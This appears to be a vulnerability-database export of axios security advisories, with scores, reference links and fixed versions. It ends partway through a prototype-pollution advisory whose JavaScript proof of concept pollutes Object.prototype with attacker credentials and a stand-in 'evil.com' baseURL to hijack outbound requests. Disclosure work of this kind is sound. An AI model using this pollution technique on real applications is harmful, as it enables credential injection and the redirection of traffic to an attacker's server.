url VCID-gp41-4j8d-37ce
vulnerability_id VCID-gp41-4j8d-37ce
summary axios: Axios: Information disclosure due to `no_proxy` bypass
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42038.json
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42038.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42038
reference_id
reference_type
scores
0
value 0.00082
scoring_system epss
scoring_elements 0.2413
published_at 2026-06-07T12:55:00Z
1
value 0.00082
scoring_system epss
scoring_elements 0.24203
published_at 2026-06-05T12:55:00Z
2
value 0.00082
scoring_system epss
scoring_elements 0.24185
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42038
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42038
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42038
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T13:46:29Z/
url https://github.com/axios/axios/security/advisories/GHSA-m7pr-hjqh-92cm
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42038
reference_id
reference_type
scores
0
value 6.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42038
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461634
reference_id 2461634
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461634
8
reference_url https://github.com/advisories/GHSA-m7pr-hjqh-92cm
reference_id GHSA-m7pr-hjqh-92cm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m7pr-hjqh-92cm
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42038, GHSA-m7pr-hjqh-92cm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gp41-4j8d-37ce
8
url VCID-h5yg-64cq-ekaa
vulnerability_id VCID-h5yg-64cq-ekaa
summary 
Server-Side Request Forgery in axios
axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39338.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-39338.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-39338
reference_id
reference_type
scores
0
value 0.02141
scoring_system epss
scoring_elements 0.84552
published_at 2026-06-07T12:55:00Z
1
value 0.02141
scoring_system epss
scoring_elements 0.84553
published_at 2026-06-05T12:55:00Z
2
value 0.02141
scoring_system epss
scoring_elements 0.84557
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-39338
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/commit/6b6b605eaf73852fb2dae033f1e786155959de3a
5
reference_url https://github.com/axios/axios/issues/6463
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/issues/6463
6
reference_url https://github.com/axios/axios/pull/6539
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/6539
7
reference_url https://github.com/axios/axios/pull/6543
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/6543
8
reference_url https://github.com/axios/axios/releases
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T19:24:57Z/
url https://github.com/axios/axios/releases
9
reference_url https://github.com/axios/axios/releases/tag/v1.7.4
reference_id
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/releases/tag/v1.7.4
10
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078878
reference_id 1078878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1078878
11
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2304369
reference_id 2304369
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2304369
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-39338
reference_id CVE-2024-39338
reference_type
scores
0
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-39338
13
reference_url https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html
reference_id CVE-2024-39338.HTML
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T19:24:57Z/
url https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html
14
reference_url https://github.com/advisories/GHSA-8hc4-vh64-cxmj
reference_id GHSA-8hc4-vh64-cxmj
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8hc4-vh64-cxmj
15
reference_url https://access.redhat.com/errata/RHSA-2024:6209
reference_id RHSA-2024:6209
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:6209
16
reference_url https://access.redhat.com/errata/RHSA-2024:6210
reference_id RHSA-2024:6210
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:6210
17
reference_url https://access.redhat.com/errata/RHSA-2024:6211
reference_id RHSA-2024:6211
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:6211
18
reference_url https://access.redhat.com/errata/RHSA-2024:6667
reference_id RHSA-2024:6667
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:6667
19
reference_url https://access.redhat.com/errata/RHSA-2024:8014
reference_id RHSA-2024:8014
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:8014
20
reference_url https://access.redhat.com/errata/RHSA-2024:8023
reference_id RHSA-2024:8023
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:8023
21
reference_url https://access.redhat.com/errata/RHSA-2024:8981
reference_id RHSA-2024:8981
reference_type
scores
url https://access.redhat.com/errata/RHSA-2024:8981
fixed_packages
0
url pkg:npm/axios@1.7.4
purl pkg:npm/axios@1.7.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-37kj-pzyt-8be6
1
vulnerability VCID-4b7a-22xk-gbh9
2
vulnerability VCID-5kg1-k416-dfc1
3
vulnerability VCID-6ru1-uamj-5ud3
4
vulnerability VCID-8a5f-cd5t-mucc
5
vulnerability VCID-axy8-kmka-pugw
6
vulnerability VCID-gp41-4j8d-37ce
7
vulnerability VCID-hadc-5d2f-gqe6
8
vulnerability VCID-jvs6-8bva-nqb3
9
vulnerability VCID-kwj2-mk8c-4fef
10
vulnerability VCID-rusx-pwdw-zqcj
11
vulnerability VCID-td7u-cct6-bud6
12
vulnerability VCID-vq2d-yv43-57b6
13
vulnerability VCID-vzqt-dj1z-bqa6
14
vulnerability VCID-xdas-dhtb-nuge
15
vulnerability VCID-xg1x-4spz-jucn
16
vulnerability VCID-yu5y-e4bk-zyfp
17
vulnerability VCID-z5pf-pqcd-ckas
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.7.4
aliases CVE-2024-39338, GHSA-8hc4-vh64-cxmj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-h5yg-64cq-ekaa
9
url VCID-hadc-5d2f-gqe6
vulnerability_id VCID-hadc-5d2f-gqe6
summary axios: Node.js: Axios: Information disclosure via CRLF injection in multipart Content-Type header
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42037.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42037.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42037
reference_id
reference_type
scores
0
value 0.00096
scoring_system epss
scoring_elements 0.26646
published_at 2026-06-07T12:55:00Z
1
value 0.00096
scoring_system epss
scoring_elements 0.26695
published_at 2026-06-05T12:55:00Z
2
value 0.00096
scoring_system epss
scoring_elements 0.26685
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42037
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42037
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42037
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-27T17:36:52Z/
url https://github.com/axios/axios/security/advisories/GHSA-445q-vr5w-6q77
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42037
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42037
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461636
reference_id 2461636
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461636
8
reference_url https://github.com/advisories/GHSA-445q-vr5w-6q77
reference_id GHSA-445q-vr5w-6q77
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-445q-vr5w-6q77
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42037, GHSA-445q-vr5w-6q77
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hadc-5d2f-gqe6
10
url VCID-jvs6-8bva-nqb3
vulnerability_id VCID-jvs6-8bva-nqb3
summary axios: Axios: Denial of Service via unbounded stream consumption when 'responseType: 'stream'' is used
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42036.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42036.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42036
reference_id
reference_type
scores
0
value 0.00031
scoring_system epss
scoring_elements 0.09378
published_at 2026-06-07T12:55:00Z
1
value 0.00031
scoring_system epss
scoring_elements 0.09373
published_at 2026-06-05T12:55:00Z
2
value 0.00031
scoring_system epss
scoring_elements 0.09393
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42036
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42036
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42036
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-vf2m-468p-8v99
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:30:17Z/
url https://github.com/axios/axios/security/advisories/GHSA-vf2m-468p-8v99
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42036
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42036
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461633
reference_id 2461633
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461633
8
reference_url https://github.com/advisories/GHSA-vf2m-468p-8v99
reference_id GHSA-vf2m-468p-8v99
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-vf2m-468p-8v99
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42036, GHSA-vf2m-468p-8v99
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-jvs6-8bva-nqb3
11
url VCID-kwj2-mk8c-4fef
vulnerability_id VCID-kwj2-mk8c-4fef
summary axios: Axios: Remote Code Execution via Prototype Pollution escalation
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
reference_id
reference_type
scores
0
value 9.0
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40175.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
reference_id
reference_type
scores
0
value 0.00063
scoring_system epss
scoring_elements 0.19837
published_at 2026-06-07T12:55:00Z
1
value 0.00063
scoring_system epss
scoring_elements 0.19885
published_at 2026-06-05T12:55:00Z
2
value 0.00063
scoring_system epss
scoring_elements 0.19878
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-40175
2
reference_url https://cert-portal.siemens.com/productcert/html/ssa-876049.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://cert-portal.siemens.com/productcert/html/ssa-876049.html
3
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-40175
4
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
5
reference_url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/
url https://github.com/axios/axios/commit/03cdfc99e8db32a390e12128208b6778492cee9c
6
reference_url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/
url https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1
7
reference_url https://github.com/axios/axios/pull/10660
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/
url https://github.com/axios/axios/pull/10660
8
reference_url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/10660#issuecomment-4224168081
9
reference_url https://github.com/axios/axios/pull/10688
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/
url https://github.com/axios/axios/pull/10688
10
reference_url https://github.com/axios/axios/releases/tag/v0.31.0
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/
url https://github.com/axios/axios/releases/tag/v0.31.0
11
reference_url https://github.com/axios/axios/releases/tag/v1.15.0
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/
url https://github.com/axios/axios/releases/tag/v1.15.0
12
reference_url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-12T20:43:26Z/
url https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx
13
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-40175
14
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
reference_id 2457432
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2457432
15
reference_url https://access.redhat.com/errata/RHSA-2026:10104
reference_id RHSA-2026:10104
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:10104
16
reference_url https://access.redhat.com/errata/RHSA-2026:10153
reference_id RHSA-2026:10153
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:10153
17
reference_url https://access.redhat.com/errata/RHSA-2026:10172
reference_id RHSA-2026:10172
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:10172
18
reference_url https://access.redhat.com/errata/RHSA-2026:10175
reference_id RHSA-2026:10175
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:10175
19
reference_url https://access.redhat.com/errata/RHSA-2026:11414
reference_id RHSA-2026:11414
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:11414
20
reference_url https://access.redhat.com/errata/RHSA-2026:13542
reference_id RHSA-2026:13542
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:13542
21
reference_url https://access.redhat.com/errata/RHSA-2026:13548
reference_id RHSA-2026:13548
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:13548
22
reference_url https://access.redhat.com/errata/RHSA-2026:13571
reference_id RHSA-2026:13571
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:13571
23
reference_url https://access.redhat.com/errata/RHSA-2026:13826
reference_id RHSA-2026:13826
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:13826
24
reference_url https://access.redhat.com/errata/RHSA-2026:14774
reference_id RHSA-2026:14774
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:14774
25
reference_url https://access.redhat.com/errata/RHSA-2026:14937
reference_id RHSA-2026:14937
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:14937
26
reference_url https://access.redhat.com/errata/RHSA-2026:15091
reference_id RHSA-2026:15091
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:15091
27
reference_url https://access.redhat.com/errata/RHSA-2026:16874
reference_id RHSA-2026:16874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16874
28
reference_url https://access.redhat.com/errata/RHSA-2026:17468
reference_id RHSA-2026:17468
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17468
29
reference_url https://access.redhat.com/errata/RHSA-2026:17474
reference_id RHSA-2026:17474
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17474
30
reference_url https://access.redhat.com/errata/RHSA-2026:17657
reference_id RHSA-2026:17657
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17657
31
reference_url https://access.redhat.com/errata/RHSA-2026:17699
reference_id RHSA-2026:17699
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17699
32
reference_url https://access.redhat.com/errata/RHSA-2026:19712
reference_id RHSA-2026:19712
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19712
33
reference_url https://access.redhat.com/errata/RHSA-2026:20041
reference_id RHSA-2026:20041
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20041
34
reference_url https://access.redhat.com/errata/RHSA-2026:20938
reference_id RHSA-2026:20938
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20938
35
reference_url https://access.redhat.com/errata/RHSA-2026:8483
reference_id RHSA-2026:8483
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8483
36
reference_url https://access.redhat.com/errata/RHSA-2026:8484
reference_id RHSA-2026:8484
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8484
37
reference_url https://access.redhat.com/errata/RHSA-2026:8490
reference_id RHSA-2026:8490
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8490
38
reference_url https://access.redhat.com/errata/RHSA-2026:8491
reference_id RHSA-2026:8491
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8491
39
reference_url https://access.redhat.com/errata/RHSA-2026:8493
reference_id RHSA-2026:8493
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8493
40
reference_url https://access.redhat.com/errata/RHSA-2026:8499
reference_id RHSA-2026:8499
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8499
41
reference_url https://access.redhat.com/errata/RHSA-2026:8500
reference_id RHSA-2026:8500
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8500
42
reference_url https://access.redhat.com/errata/RHSA-2026:8501
reference_id RHSA-2026:8501
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:8501
43
reference_url https://access.redhat.com/errata/RHSA-2026:9742
reference_id RHSA-2026:9742
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:9742
fixed_packages
0
url pkg:npm/axios@1.15.0
purl pkg:npm/axios@1.15.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-4b7a-22xk-gbh9
1
vulnerability VCID-5kg1-k416-dfc1
2
vulnerability VCID-6ru1-uamj-5ud3
3
vulnerability VCID-8a5f-cd5t-mucc
4
vulnerability VCID-gp41-4j8d-37ce
5
vulnerability VCID-hadc-5d2f-gqe6
6
vulnerability VCID-jvs6-8bva-nqb3
7
vulnerability VCID-rusx-pwdw-zqcj
8
vulnerability VCID-vzqt-dj1z-bqa6
9
vulnerability VCID-xdas-dhtb-nuge
10
vulnerability VCID-xg1x-4spz-jucn
11
vulnerability VCID-yu5y-e4bk-zyfp
12
vulnerability VCID-z5pf-pqcd-ckas
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.0
aliases CVE-2026-40175, GHSA-fvcv-3m26-pcqx
risk_score 4.0
exploitability 0.5
weighted_severity 8.1
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-kwj2-mk8c-4fef
12
url VCID-rusx-pwdw-zqcj
vulnerability_id VCID-rusx-pwdw-zqcj
summary 
Axios has prototype pollution read-side gadgets in HTTP adapter that allow credential injection and request hijacking
## Summary

Five config properties in the HTTP adapter are read via direct property access without `hasOwnProperty` guards, making them exploitable as prototype pollution gadgets. When `Object.prototype` is polluted by another dependency in the same process, axios silently picks up these polluted values on every outbound HTTP request.

## Affected Properties

1. **`config.auth`** (`lib/adapters/http.js` line 617)  Injects attacker-controlled `Authorization` header on all requests.
2. **`config.baseURL`** (`lib/helpers/resolveConfig.js` line 18) Redirects all requests using relative URLs to an attacker-controlled server.
3. **`config.socketPath`** (`lib/adapters/http.js` line 669) Redirects requests to internal Unix sockets (e.g. Docker daemon).
4. **`config.beforeRedirect`** (`lib/adapters/http.js` line 698) Executes attacker-supplied callback during HTTP redirects.
5. **`config.insecureHTTPParser`** (`lib/adapters/http.js` line 712) Enables Node.js insecure HTTP parser on all requests.

## Proof of Concept

```javascript
const axios = require('axios');

// Prototype pollution from a vulnerable dependency in the same process
Object.prototype.auth = { username: 'attacker', password: 'exfil' };
Object.prototype.baseURL = 'https://evil.com';

